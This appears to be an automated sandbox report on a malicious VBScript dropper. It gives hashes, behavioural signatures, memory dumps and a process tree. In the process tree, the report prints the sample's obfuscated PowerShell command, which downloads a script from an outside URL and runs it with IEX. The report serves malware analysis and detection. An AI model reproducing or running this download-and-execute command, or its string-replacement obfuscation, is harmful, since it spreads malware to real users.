Analysis
- max time kernel: 122s
- max time network: 124s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 26-02-2022 23:48
Static task: static1
Behavioral task: behavioral1
- Sample: KELCYML94182.vbs
- Resource: win7-en-20211208 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: KELCYML94182.vbs
- Resource: win10-20220223-en (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: KELCYML94182.vbs
- Size: 820B
- MD5: 876924f6b4fe731b83fdd100bbf26cc2
- SHA1: 411d8886c79f7acfb50663234b67f22f5bc48cdd
- SHA256: 7ce24a33f4c22348ea1da16e5d04ac7936b8488a48371673343754e586069faf
- SHA512: f0173ca14f0066a458946484cd2be6126c70ac3ce1c221d3265e76b89dc38ae9285732539a97315664c20c199403f7bd9135b05f136f030bbdf8a090c690c543
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): https://sikabid.com/.Final2.txt
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes: flow 5, PID 564, powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: PID 564, powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: PID 564, powershell.exe; description: Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description / PID / process / target process), three identical rows:
  PID 576 wrote to memory of 564 / 576 / WScript.exe / powershell.exe
  PID 576 wrote to memory of 564 / 576 / WScript.exe / powershell.exe
  PID 576 wrote to memory of 564 / 576 / WScript.exe / powershell.exe
Processes
- C:\Windows\System32\WScript.exe (PID 576, process tree level 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KELCYML94182.vbs"
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 564, process tree level 2, child of PID 576)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'h+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','ttps://sikab').Replace('################','id.com/.Final2.txt'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/564-57-0x000007FEF2B30000-0x000007FEF368D000-memory.dmp (11.4MB)
- memory/564-58-0x000007FEF525E000-0x000007FEF525F000-memory.dmp (4KB)
- memory/564-59-0x0000000002640000-0x0000000002642000-memory.dmp (8KB)
- memory/564-61-0x0000000002644000-0x0000000002647000-memory.dmp (12KB)
- memory/564-60-0x0000000002642000-0x0000000002644000-memory.dmp (8KB)
- memory/564-62-0x000000001B7E0000-0x000000001BADF000-memory.dmp (3.0MB)
- memory/564-63-0x000000000264B000-0x000000000266A000-memory.dmp (124KB)
- memory/576-55-0x000007FEFBC01000-0x000007FEFBC03000-memory.dmp (8KB)